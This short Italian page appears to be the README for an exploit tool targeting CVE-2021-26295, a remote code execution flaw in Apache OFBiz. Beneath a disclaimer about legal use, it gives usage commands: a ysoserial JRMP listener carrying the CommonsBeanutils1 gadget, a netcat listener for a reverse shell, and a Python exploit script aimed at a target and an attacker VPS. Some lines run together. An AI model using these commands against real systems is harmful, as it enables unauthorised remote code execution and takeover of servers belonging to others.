
Exploit per CVE-2021-26295 (Apache OFBiz RCE) che utilizza il listener JRMP di ysoserial per eseguire comandi e ottenere una reverse shell su target vulnerabili.
CVE-2021-26295 EXP può ottenere con successo una shell inversa
Questo articolo e lo strumento sono solo per condivisione tecnica. È severamente vietato l'uso per scopi illegali. In caso contrario, l'utente si assume ogni responsabilità per le conseguenze.
RMI sulla porta 9999 dal VPSjava -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[要执行的命令]'
nc64444nc -lvp 64444
python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>

